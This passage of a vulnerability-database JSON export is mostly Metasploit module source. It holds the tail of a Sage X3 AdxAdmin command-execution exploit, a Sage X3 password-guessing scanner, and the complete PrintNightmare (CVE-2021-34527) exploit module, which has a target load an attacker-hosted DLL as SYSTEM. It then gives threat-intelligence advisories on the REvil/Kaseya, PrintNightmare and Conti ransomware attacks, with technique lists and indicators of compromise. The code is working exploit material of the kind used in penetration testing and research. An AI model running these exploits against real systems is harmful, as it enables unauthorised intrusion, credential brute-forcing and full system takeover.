2>#{sagedir}\\\\tmp\\\\#{filenum}.err\\r\\n@echo on\"\n sendbuf = build_buffer(head, sage_payload, nil)\n s.write(sendbuf)\n s.recv(1024)\n\n # Packet --- Delim\n s.write(delim0)\n s.recv(1024)\n\n # Packet --- 6\n head = \"\\x00\\x00\\x36\\x04\\x00\\x2e\\x00\"\n sage_payload = \"#{revsagedir}\\\\tmp\\\\sess#{filenum}.cmd\"\n tail = \"\\x00\\x03\\x00\\x01\\x72\"\n sendbuf = build_buffer(head, sage_payload, tail)\n s.write(sendbuf)\n s.recv(1024)\n\n # if it's not COMMAND, we can stop here\n # otherwise, we'll send/recv the last bit\n # of info for the output\n unless target.name == 'Windows Command'\n disconnect\n return\n end\n\n # Packet --- Delim\n delim1 = \"\\x02\\x00\\x05\\x05\\x00\\x00\\x10\\x00\"\n s.write(delim1)\n s.recv(1024)\n\n # Packet --- Delim\n s.write(delim0)\n s.recv(1024)\n\n # The two below are directing the server to read from the .out file that should have been created\n # Then we get the output back\n # Packet --- 7 - Still works when removed.\n head = \"\\x00\\x00\\x2f\\x07\\x08\\x00\\x2b\\x00\"\n sage_payload = \"@#{revsagedir}/tmp/#{filenum}$out\"\n sendbuf = build_buffer(head, sage_payload, nil)\n s.write(sendbuf)\n s.recv(1024)\n\n # Packet --- 8\n head = \"\\x00\\x00\\x33\\x02\\x00\\x2b\\x00\"\n sage_payload = \"@#{revsagedir}/tmp/#{filenum}$out\"\n tail = \"\\x00\\x03\\x00\\x01\\x72\"\n sendbuf = build_buffer(head, sage_payload, tail)\n s.write(sendbuf)\n s.recv(1024)\n\n s.write(delim1)\n returned_data = s.recv(8096).strip!\n\n if returned_data.nil? || returned_data.empty?\n disconnect\n fail_with(Failure::PayloadFailed, 'No data appeared to be returned, try again')\n end\n\n print_good('------------ Response Received ------------')\n print_status(returned_data)\n disconnect\n end\n\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/sage/x3_adxsrv_auth_bypass_cmd_exec.rb", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-04-15T03:49:00", "description": "This module allows an attacker to perform a password guessing attack against the Sage X3 AdxAdmin service, which in turn can be used to authenticate to a local Windows account. This module implements the X3Crypt function to 'encrypt' any passwords to be used during the authentication process, given a plaintext password.\n", "cvss3": {}, "published": "2021-07-21T01:07:08", "type": "metasploit", "title": "Sage X3 AdxAdmin Login Scanner", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2020-7387"], "modified": "2021-09-02T15:57:38", "id": "MSF:AUXILIARY-SCANNER-SAGE-X3_ADXSRV_LOGIN-", "href": "https://www.rapid7.com/db/modules/auxiliary/scanner/sage/x3_adxsrv_login/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'metasploit/framework/login_scanner/x3'\nrequire 'metasploit/framework/credential_collection'\n\nclass MetasploitModule < Msf::Auxiliary\n\n include Msf::Auxiliary::Scanner\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::AuthBrute\n include Msf::Exploit::Remote::Tcp\n\n def initialize(_info = {})\n super(\n 'Name' => 'Sage X3 AdxAdmin Login Scanner',\n 'Description' => %q{\n This module allows an attacker to perform a password guessing attack against\n the Sage X3 AdxAdmin service, which in turn can be used to authenticate to\n a local Windows account.\n\n This module implements the X3Crypt function to 'encrypt' any passwords to\n be used during the authentication process, given a plaintext password.\n },\n 'Author' => ['Jonathan Peterson <deadjakk[at]shell.rip>'], # @deadjakk\n 'License' => MSF_LICENSE,\n 'References' => [\n ['URL', 'https://www.rapid7.com/blog/post/2021/07/07/cve-2020-7387-7390-multiple-sage-x3-vulnerabilities/']\n ]\n )\n\n register_options(\n [\n Opt::RPORT(1818),\n OptString.new('USERNAME', [false, 'User with which to authenticate to the AdxAdmin service', 'x3admin']),\n OptString.new('PASSWORD', [false, 'Plaintext password with which to authenticate', 's@ge2020'])\n ]\n )\n\n deregister_options('PASSWORD_SPRAY', 'BLANK_PASSWORDS')\n end\n\n def run_host(ip)\n cred_collection = build_credential_collection(\n blank_passwords: false,\n password: datastore['PASSWORD'],\n username: datastore['USERNAME']\n )\n\n scanner = Metasploit::Framework::LoginScanner::X3.new(\n host: ip,\n port: rport,\n cred_details: cred_collection,\n stop_on_success: datastore['STOP_ON_SUCCESS'],\n bruteforce_speed: datastore['BRUTEFORCE_SPEED'],\n max_send_size: datastore['TCP::max_send_size'],\n send_delay: datastore['TCP::send_delay'],\n framework: framework,\n framework_module: self,\n local_port: datastore['CPORT'],\n local_host: datastore['CHOST']\n )\n\n scanner.scan! do |result|\n credential_data = result.to_h\n credential_data.merge!(\n module_fullname: fullname,\n workspace_id: myworkspace_id\n )\n\n case result.status\n when Metasploit::Model::Login::Status::SUCCESSFUL\n print_brute(level: :good, ip: ip, msg: \"Success: '#{result.credential}'\")\n credential_core = create_credential(credential_data)\n credential_data[:core] = credential_core\n create_credential_login(credential_data)\n next\n when Metasploit::Model::Login::Status::UNABLE_TO_CONNECT\n vprint_brute(level: :verror, ip: ip, msg: \"Could not connect: #{result.proof}\")\n when Metasploit::Model::Login::Status::INCORRECT\n vprint_brute(level: :verror, ip: ip, msg: \"Failed: '#{result.credential}'\")\n end\n\n invalidate_login(credential_data)\n end\n end\n\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/sage/x3_adxsrv_login.rb", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-06-24T15:45:01", "description": "The print spooler service can be abused by an authenticated remote attacker to load a DLL through a crafted DCERPC request, resulting in remote code execution as NT AUTHORITY\\SYSTEM. This module uses the MS-RPRN vector which requires the Print Spooler service to be running.\n", "cvss3": {}, "published": "2022-05-16T18:56:46", "type": "metasploit", "title": "Print Spooler Remote DLL Injection", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-1675", "CVE-2021-34527"], "modified": "2022-05-24T13:16:30", "id": "MSF:EXPLOIT-WINDOWS-DCERPC-CVE_2021_1675_PRINTNIGHTMARE-", "href": "https://www.rapid7.com/db/modules/exploit/windows/dcerpc/cve_2021_1675_printnightmare/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'windows_error'\nrequire 'ruby_smb'\nrequire 'ruby_smb/error'\n\nclass MetasploitModule < Msf::Exploit::Remote\n\n prepend Msf::Exploit::Remote::AutoCheck\n include Msf::Exploit::Remote::DCERPC\n include Msf::Exploit::Remote::SMB::Client::Authenticated\n include Msf::Exploit::Remote::SMB::Server::Share\n include Msf::Exploit::Retry\n include Msf::Exploit::EXE\n include Msf::Exploit::Deprecated\n\n moved_from 'auxiliary/admin/dcerpc/cve_2021_1675_printnightmare'\n\n PrintSystem = RubySMB::Dcerpc::PrintSystem\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Print Spooler Remote DLL Injection',\n 'Description' => %q{\n The print spooler service can be abused by an authenticated remote attacker to load a DLL through a crafted\n DCERPC request, resulting in remote code execution as NT AUTHORITY\\SYSTEM. This module uses the MS-RPRN\n vector which requires the Print Spooler service to be running.\n },\n 'Author' => [\n 'Zhiniang Peng', # vulnerability discovery / research\n 'Xuefeng Li', # vulnerability discovery / research\n 'Zhipeng Huo', # vulnerability discovery\n 'Piotr Madej', # vulnerability discovery\n 'Zhang Yunhai', # vulnerability discovery\n 'cube0x0', # PoC\n 'Spencer McIntyre', # metasploit module\n 'Christophe De La Fuente', # metasploit module co-author\n ],\n 'License' => MSF_LICENSE,\n 'DefaultOptions' => {\n 'SRVHOST' => Rex::Socket.source_address\n },\n 'Stance' => Msf::Exploit::Stance::Aggressive,\n 'Targets' => [\n [\n 'Windows', {\n 'Platform' => 'win',\n 'Arch' => [ ARCH_X64, ARCH_X86 ]\n },\n ],\n ],\n 'DisclosureDate' => '2021-06-08',\n 'References' => [\n ['CVE', '2021-1675'],\n ['CVE', '2021-34527'],\n ['URL', 'https://github.com/cube0x0/CVE-2021-1675'],\n ['URL', 'https://web.archive.org/web/20210701042336/https://github.com/afwu/PrintNightmare'],\n ['URL', 'https://github.com/calebstewart/CVE-2021-1675/blob/main/CVE-2021-1675.ps1'],\n ['URL', 'https://github.com/byt3bl33d3r/ItWasAllADream']\n ],\n 'Notes' => {\n 'AKA' => [ 'PrintNightmare' ],\n 'Stability' => [CRASH_SERVICE_DOWN],\n 'Reliability' => [UNRELIABLE_SESSION],\n 'SideEffects' => [\n ARTIFACTS_ON_DISK # the dll will be copied to the remote server\n ]\n }\n )\n )\n\n register_advanced_options(\n [\n OptInt.new('ReconnectTimeout', [ true, 'The timeout in seconds for reconnecting to the named pipe', 10 ])\n ]\n )\n deregister_options('AutoCheck')\n end\n\n def check\n begin\n connect(backend: :ruby_smb)\n rescue Rex::ConnectionError\n return Exploit::CheckCode::Unknown('Failed to connect to the remote service.')\n end\n\n begin\n smb_login\n rescue Rex::Proto::SMB::Exceptions::LoginError\n return Exploit::CheckCode::Unknown('Failed to authenticate to the remote service.')\n end\n\n begin\n dcerpc_bind_spoolss\n rescue RubySMB::Error::UnexpectedStatusCode => e\n nt_status = ::WindowsError::NTStatus.find_by_retval(e.status_code.value).first\n if nt_status == ::WindowsError::NTStatus::STATUS_OBJECT_NAME_NOT_FOUND\n print_error(\"The 'Print Spooler' service is disabled.\")\n end\n return Exploit::CheckCode::Safe(\"The DCERPC bind failed with error #{nt_status.name} (#{nt_status.description}).\")\n end\n\n @target_arch = dcerpc_getarch\n # see: https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rprn/e81cbc09-ab05-4a32-ae4a-8ec57b436c43\n if @target_arch == ARCH_X64\n @environment = 'Windows x64'\n elsif @target_arch == ARCH_X86\n @environment = 'Windows NT x86'\n else\n return Exploit::CheckCode::Detected('Successfully bound to the remote service.')\n end\n\n print_status(\"Target environment: Windows v#{simple.client.os_version} (#{@target_arch})\")\n\n print_status('Enumerating the installed printer drivers...')\n drivers = enum_printer_drivers(@environment)\n @driver_path = \"#{drivers.driver_path.rpartition('\\\\').first}\\\\UNIDRV.DLL\"\n vprint_status(\"Using driver path: #{@driver_path}\")\n\n print_status('Retrieving the path of the printer driver directory...')\n @config_directory = get_printer_driver_directory(@environment)\n vprint_status(\"Using driver directory: #{@config_directory}\") unless @config_directory.nil?\n\n container = driver_container(\n p_config_file: 'C:\\\\Windows\\\\System32\\\\kernel32.dll',\n p_data_file: \"\\\\??\\\\UNC\\\\127.0.0.1\\\\#{Rex::Text.rand_text_alphanumeric(4..8)}\\\\#{Rex::Text.rand_text_alphanumeric(4..8)}.dll\"\n )\n\n case add_printer_driver_ex(container)\n when nil # prevent the module from erroring out in case the response can't be mapped to a Win32 error code\n return Exploit::CheckCode::Unknown('Received unknown status code, implying the target is not vulnerable.')\n when ::WindowsError::Win32::ERROR_PATH_NOT_FOUND\n return Exploit::CheckCode::Vulnerable('Received ERROR_PATH_NOT_FOUND, implying the target is vulnerable.')\n when ::WindowsError::Win32::ERROR_BAD_NET_NAME\n return Exploit::CheckCode::Vulnerable('Received ERROR_BAD_NET_NAME, implying the target is vulnerable.')\n when ::WindowsError::Win32::ERROR_ACCESS_DENIED\n return Exploit::CheckCode::Safe('Received ERROR_ACCESS_DENIED implying the target is patched.')\n end\n\n Exploit::CheckCode::Detected('Successfully bound to the remote service.')\n end\n\n def run\n fail_with(Failure::BadConfig, 'Can not use an x64 payload on an x86 target.') if @target_arch == ARCH_X86 && payload.arch.first == ARCH_X64\n fail_with(Failure::NoTarget, 'Only x86 and x64 targets are supported.') if @environment.nil?\n fail_with(Failure::Unknown, 'Failed to enumerate the driver directory.') if @config_directory.nil?\n\n super\n end\n\n def setup\n if Rex::Socket.is_ip_addr?(datastore['SRVHOST']) && Rex::Socket.addr_atoi(datastore['SRVHOST']) == 0\n fail_with(Exploit::Failure::BadConfig, 'The SRVHOST option must be set to a routable IP address.')\n end\n\n super\n end\n\n def start_service\n file_name << '.dll'\n self.file_contents = generate_payload_dll\n\n super\n end\n\n def primer\n dll_path = unc\n if dll_path =~ /^\\\\\\\\([\\w:.\\[\\]]+)\\\\(.*)$/\n # targets patched for CVE-2021-34527 (but with Point and Print enabled) need to use this path style as a bypass\n # otherwise the operation will fail with ERROR_INVALID_PARAMETER\n dll_path = \"\\\\??\\\\UNC\\\\#{Regexp.last_match(1)}\\\\#{Regexp.last_match(2)}\"\n end\n vprint_status(\"Using DLL path: #{dll_path}\")\n\n filename = dll_path.rpartition('\\\\').last\n container = driver_container(p_config_file: 'C:\\\\Windows\\\\System32\\\\kernel32.dll', p_data_file: dll_path)\n\n 3.times do\n add_printer_driver_ex(container)\n end\n\n 1.upto(3) do |directory|\n container.driver_info.p_config_file.assign(\"#{@config_directory}\\\\3\\\\old\\\\#{directory}\\\\#{filename}\")\n break if add_printer_driver_ex(container).nil?\n end\n\n cleanup_service\n end\n\n def driver_container(**kwargs)\n PrintSystem::DriverContainer.new(\n level: 2,\n tag: 2,\n driver_info: PrintSystem::DriverInfo2.new(\n c_version: 3,\n p_name_ref_id: 0x00020000,\n p_environment_ref_id: 0x00020004,\n p_driver_path_ref_id: 0x00020008,\n p_data_file_ref_id: 0x0002000c,\n p_config_file_ref_id: 0x00020010,\n # https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rprn/4464eaf0-f34f-40d5-b970-736437a21913\n p_name: \"#{Rex::Text.rand_text_alpha_upper(2..4)} #{Rex::Text.rand_text_numeric(2..3)}\",\n p_environment: @environment,\n p_driver_path: @driver_path,\n **kwargs\n )\n )\n end\n\n def dcerpc_bind_spoolss\n handle = dcerpc_handle(PrintSystem::UUID, '1.0', 'ncacn_np', ['\\\\spoolss'])\n vprint_status(\"Binding to #{handle} ...\")\n dcerpc_bind(handle)\n vprint_status(\"Bound to #{handle} ...\")\n end\n\n def enum_printer_drivers(environment)\n response = rprn_call('RpcEnumPrinterDrivers', p_environment: environment, level: 2)\n response = rprn_call('RpcEnumPrinterDrivers', p_environment: environment, level: 2, p_drivers: [0] * response.pcb_needed, cb_buf: response.pcb_needed)\n fail_with(Failure::UnexpectedReply, 'Failed to enumerate printer drivers.') unless response.p_drivers&.length\n DriverInfo2.read(response.p_drivers.map(&:chr).join)\n end\n\n def get_printer_driver_directory(environment)\n response = rprn_call('RpcGetPrinterDriverDirectory', p_environment: environment, level: 2)\n response = rprn_call('RpcGetPrinterDriverDirectory', p_environment: environment, level: 2, p_driver_directory: [0] * response.pcb_needed, cb_buf: response.pcb_needed)\n fail_with(Failure::UnexpectedReply, 'Failed to obtain the printer driver directory.') unless response.p_driver_directory&.length\n RubySMB::Field::Stringz16.read(response.p_driver_directory.map(&:chr).join).encode('ASCII-8BIT')\n end\n\n def add_printer_driver_ex(container)\n flags = PrintSystem::APD_INSTALL_WARNED_DRIVER | PrintSystem::APD_COPY_FROM_DIRECTORY | PrintSystem::APD_COPY_ALL_FILES\n\n begin\n response = rprn_call('RpcAddPrinterDriverEx', p_name: \"\\\\\\\\#{datastore['RHOST']}\", p_driver_container: container, dw_file_copy_flags: flags)\n rescue RubySMB::Error::UnexpectedStatusCode => e\n nt_status = ::WindowsError::NTStatus.find_by_retval(e.status_code.value).first\n message = \"Error #{nt_status.name} (#{nt_status.description})\"\n if nt_status == ::WindowsError::NTStatus::STATUS_PIPE_BROKEN\n # STATUS_PIPE_BROKEN is the return value when the payload is executed, so this is somewhat expected\n print_status('The named pipe connection was broken, reconnecting...')\n reconnected = retry_until_truthy(timeout: datastore['ReconnectTimeout'].to_i) do\n dcerpc_bind_spoolss\n rescue RubySMB::Error::CommunicationError, RubySMB::Error::UnexpectedStatusCode => e\n false\n else\n true\n end\n\n unless reconnected\n vprint_status('Failed to reconnect to the named pipe.')\n return nil\n end\n\n print_status('Successfully reconnected to the named pipe.')\n retry\n else\n print_error(message)\n end\n\n return nt_status\n end\n\n error = ::WindowsError::Win32.find_by_retval(response.error_status.value).first\n message = \"RpcAddPrinterDriverEx response #{response.error_status}\"\n message << \" #{error.name} (#{error.description})\" unless error.nil?\n vprint_status(message)\n error\n end\n\n def rprn_call(name, **kwargs)\n request = PrintSystem.const_get(\"#{name}Request\").new(**kwargs)\n\n begin\n raw_response = dcerpc.call(request.opnum, request.to_binary_s)\n rescue Rex::Proto::DCERPC::Exceptions::Fault => e\n fail_with(Failure::UnexpectedReply, \"The #{name} Print System RPC request failed (#{e.message}).\")\n end\n\n PrintSystem.const_get(\"#{name}Response\").read(raw_response)\n end\n\n class DriverInfo2Header < BinData::Record\n endian :little\n\n uint32 :c_version\n uint32 :name_offset\n uint32 :environment_offset\n uint32 :driver_path_offset\n uint32 :data_file_offset\n uint32 :config_file_offset\n end\n\n # this is a partial implementation that just parses the data, this is *not* the same struct as PrintSystem::DriverInfo2\n # see: https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rprn/2825d22e-c5a5-47cd-a216-3e903fd6e030\n DriverInfo2 = Struct.new(:header, :name, :environment, :driver_path, :data_file, :config_file) do\n def self.read(data)\n header = DriverInfo2Header.read(data)\n new(\n header,\n RubySMB::Field::Stringz16.read(data[header.name_offset..]).encode('ASCII-8BIT'),\n RubySMB::Field::Stringz16.read(data[header.environment_offset..]).encode('ASCII-8BIT'),\n RubySMB::Field::Stringz16.read(data[header.driver_path_offset..]).encode('ASCII-8BIT'),\n RubySMB::Field::Stringz16.read(data[header.data_file_offset..]).encode('ASCII-8BIT'),\n RubySMB::Field::Stringz16.read(data[header.config_file_offset..]).encode('ASCII-8BIT')\n )\n end\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/dcerpc/cve_2021_1675_printnightmare.rb", "cvss": {"score": 0.0, "vector": "NONE"}}], "hivepro": [{"lastseen": "2021-08-23T15:19:10", "description": "#### THREAT LEVEL: Red.\n\nFor a detailed advisory, [download the pdf file here](<https://www.hivepro.com/wp-content/uploads/2021/07/TA202124.pdf>).\n\nThe REvil ransomware group was successful in carrying out a supply chain attack by exploiting the zero-day vulnerability (CVE-2021-30116) in the Kaseya VSA server and delivering a malicious script to all the computer devices managed by servers. The script delivered the REvil ransomware and encrypted the files of the clients managed by the server affecting almost 1 million computer devices.\n\nHive Pro researchers have identified that there are three more zero-day vulnerabilities that were possibly used to target the clients:\n\n * Authentication Bypass Vulnerability\n * Arbitrary File Upload Vulnerability\n * Code Injection Vulnerability\n\n**The Techniques used by the REvil ransomware includes:**\n\n * TA0001: Initial Access\n * T1189: Drive-by Compromise\n * T1566: Phishing\n * T1566.001: Spear phishing Attachment\n * TA0002: Execution\n * T1059: Command and Scripting Interpreter\n * T1106: Native API\n * T1059.001: PowerShell\n * T1059.005: Visual Basic\n * T1059.003: Windows Command Shell\n * TA0003: Persistence\n * T1204: User Execution\n * T1047: Windows Management Instrumentation\n * T1204.002: Malicious File\n * TA0004: Privilege Escalation\n * T1134: Access Token Manipulation\n * T1134.002: Create Process with Token\n * T1134.001: Token Impersonation/Theft\n * T1574:Hijack Execution Flow\n * T1574.002:Hijack Execution Flow: DLL Side-Loading\n * TA0005: Defense Evasion\n * T1134: Access Token Manipulation\n * T1134.002: Create Process with Token\n * T1134.001: Token Impersonation/Theft\n * T1140: DE obfuscate/Decode Files or Information\n * T1055: Process Injection\n * TA0006: Credential Access\n * T1562: Impair Defenses\n * T1562.001: Disable or Modify Tools\n * T1070: Indicator Removal on Host\n * T1070.004: File Deletion\n * T1036: Masquerading\n * T1036.005: Match Legitimate Name or Location\n * T1112: Modify Registry\n * T1027: Obfuscated Files or Information\n * T1055: Process Injection\n * TA0007: Discovery\n * T1083: File and Directory Discovery\n * TA0008: Lateral Movement\n * T1069: Permission Groups Discovery\n * T1069.002: Domain Groups\n * T1012: Query Registry\n * T1082: System Information Discovery\n * TA0011: Command and Control\n * T1071: Application Layer Protocol\n * T1071.001: Web Protocols \n * T1573: Encrypted Channel \n * T1573.002: Asymmetric Cryptography\n * T1105: Ingress Tool Transfer\n * TA0010: Exfiltration\n * T1041: Exfiltration Over C2 Channel\n * TA0040: Impact\n * T1485: Data Destruction\n * T1486: Data Encrypted for Impact\n * T1490: Inhibit System Recovery \n * T1489: Service Stop\n\n#### Threat Actor\n\n![](https://www.hivepro.com/wp-content/uploads/2021/07/Screenshot7656-1024x109.png)\n\n#### Vulnerability Details\n\n![](https://www.hivepro.com/wp-content/uploads/2021/07/VulnerabilityDetails-1024x133.png)\n\n#### Indicators of Compromise\n\n**Type**| **Value** \n---|--- \nIPv4| 161[.]35.239.148 \nHash(SHA1)| d55f983c994caa160ec63a59f6b4250fe67fb3e8c43a388aec60a4a6978e9f1e \n8dd620d9aeb35960bb766458c8890ede987c33d239cf730f93fe49d90ae759dd \ne2a24ab94f865caeacdf2c3ad015f31f23008ac6db8312c2cbfb32e4a5466ea2 \n45AEBD60E3C4ED8D3285907F5BF6C71B3B60A9BCB7C34E246C20410CF678FC0C \n \n#### References\n\n<https://www.bleepingcomputer.com/news/security/kaseya-was-fixing-zero-day-just-as-revil-ransomware-sprung-their-attack/>\n\n<https://otx.alienvault.com/pulse/60e40b4535299fb6755143cf>\n\n<https://us-cert.cisa.gov/ncas/current-activity/2021/07/02/kaseya-vsa-supply-chain-ransomware-attack>\n\n<https://www.tenable.com/blog/cve-2021-30116-multiple-zero-day-vulnerabilities-in-kaseya-vsa-exploited-to-distribute-ransomware>\n\n<https://www.reddit.com/r/msp/comments/ocggbv/crticial_ransomware_incident_in_progress/>\n\n<https://blog.truesec.com/2021/07/04/kaseya-supply-chain-attack-targeting-msps-to-deliver-revil-ransomware/>", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-07-08T12:32:57", "type": "hivepro", "title": "REvil Ransomware gang behind the Kaseya VSA Supply-Chain attack", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-30116"], "modified": "2021-07-08T12:32:57", "id": "HIVEPRO:3E02C2FF0A137A10F6A8876C69C320B3", "href": "https://www.hivepro.com/revil-ransomware-gang-behind-the-kaseya-vsa-supply-chain-attack/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-03-22T07:28:58", "description": "THREAT LEVEL: Red. For a detailed advisory, download the pdf file here The Cybersecurity and Infrastructure Security Agency (CISA) and the Federal Bureau of Investigation (FBI) have issued an alert for enterprises that Russian state-sponsored cyber attackers have obtained network access by exploiting default MFA protocols and a known vulnerability. Russian state-sponsored cyber attackers got initial access to the target organization by using compromising credentials and registering a new device in the organization's Duo multi-factor authentication (MFA). The actors obtained the credentials using a brute-force password guessing attack, which provided them with access to a victim account with a basic, predictable password. The victim account had been unenrolled from Duo after a long period of inactivity, but it had not been deactivated in Active Directory. The actors were able to enroll a new device for this account, satisfy the authentication requirements, and get access to the victim network since Duo's default configuration settings allow for the re-enrollment of a new device for inactive accounts. Using the stolen account, Russian state-sponsored cyber attackers gained administrator rights by exploiting the "PrintNightmare" vulnerability (CVE-2021-34527). Furthermore, the cyber actors were able to obtain required material by moving laterally to the victim's cloud storage and email accounts. The organizations can apply the following mitigations: To prevent against "fail open" and re-enrollment scenarios, enforce MFA and examine configuration restrictions. Assure that inactive accounts are deactivated consistently across the Active Directory and MFA systems. Ensure that inactive accounts are deactivated equally across Active Directory, MFA systems, and other systems. Update software such as operating systems, apps, and hardware on a regular basis. The Mitre TTPs used in the current attack are:TA0001 - Initial AccessTA0003 - PersistenceTA0004 - Privilege EscalationTA0005 - Defense EvasionTA0006 - Credential AccessTA0007 - DiscoveryTA0008 - Lateral MovementTA0009 - CollectionT1078: Valid AccountsT1133: External Remote ServicesT1556: Modify Authentication ProcessT1068: Exploitation for Privilege EscalationT1112: Modify RegistryT1110.001: Brute Force: Password GuessingT1003.003: OS Credential Dumping: NTDST1018: Remote System DiscoveryT1560.001: Archive Collected Data: Archive via Utility Vulnerability Details Indicators of Compromise (IoCs) Patch Link https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527 References https://www.cisa.gov/uscert/ncas/alerts/aa22-074a", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2022-03-18T13:58:03", "type": "hivepro", "title": "Russian threat actors leveraging misconfigured multifactor authentication to exploit PrintNightmare vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34527"], "modified": "2022-03-18T13:58:03", "id": "HIVEPRO:8D09682ECAC92A6EA4B81D42F45F0233", "href": "https://www.hivepro.com/russian-threat-actors-leveraging-misconfigured-mfa-to-exploit-printnightmare-vulnerability/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2021-09-26T09:19:08", "description": "#### THREAT LEVEL: Red.\n\nFor a detailed advisory, [download the pdf file here.](<https://www.hivepro.com/wp-content/uploads/2021/09/TA202137.pdf>)\n\nConti Ransomware targets enterprises who have not patched their systems by exploiting old vulnerabilities. Conti Ransomware steals sensitive information from businesses and demands a ransom in exchange. CISA has issued a warning about the rise in Conti ransomware attacks. To avoid becoming a victim of Conti ransomware, the Hive Pro Threat Research team suggested you patch these vulnerabilities.\n\nThe techniques used by the Conti includes:\n\n * T1078 - Valid Accounts\n * T1133 - External Remote Services\n * T1566.001 - Phishing: Spearphishing Attachment\n * T1566.002 - Phishing: Spearphishing Link\n * T1059.003 - Command and Scripting Interpreter: Windows Command Shell\n * T1106 - Native API\n * T1055.001 - Process Injection: Dynamic-link Library Injection\n * T1027 - Obfuscated Files or Information\n * T1140 - Deobfuscate/Decode Files or Information\n * T1110 - Brute Force\n * T1558.003 - Steal or Forge Kerberos Tickets: Kerberoasting\n * T1016 - System Network Configuration Discovery\n * T1049 - System Network Connections Discovery\n * T1057 - Process Discovery\n * T1083 - File and Directory Discovery\n * T1135 - Network Share Discovery\n * T1021.002 - Remote Services: SMB/Windows Admin Shares\n * T1080 - Taint Shared Content\n * T1486 - Data Encrypted for Impact\n * T1489 - Service Stop\n * T1490 - Inhibit System Recovery\n\n#### Actor Details\n\n![](https://www.hivepro.com/wp-content/uploads/2021/09/1-2-1024x245.png)\n\n#### Vulnerability Details\n\n![](https://www.hivepro.com/wp-content/uploads/2021/09/2-3.png)\n\n#### Indicators of Compromise (IoCs)\n\n**Type** | **Value** \n---|--- \nIPV4 | 162.244.80[.]235 \n85.93.88[.]165 \n185.141.63[.]120 \n82.118.21[.]1 \n \n#### Patch Links\n\n<https://docs.microsoft.com/en-us/security-updates/securitybulletins/2017/ms17-010>\n\n<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527>\n\n<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-1472>\n\n#### References\n\n<https://us-cert.cisa.gov/ncas/alerts/aa21-265a>", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-09-23T13:47:51", "type": "hivepro", "title": "Are you a victim of the Conti Ransomware?", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 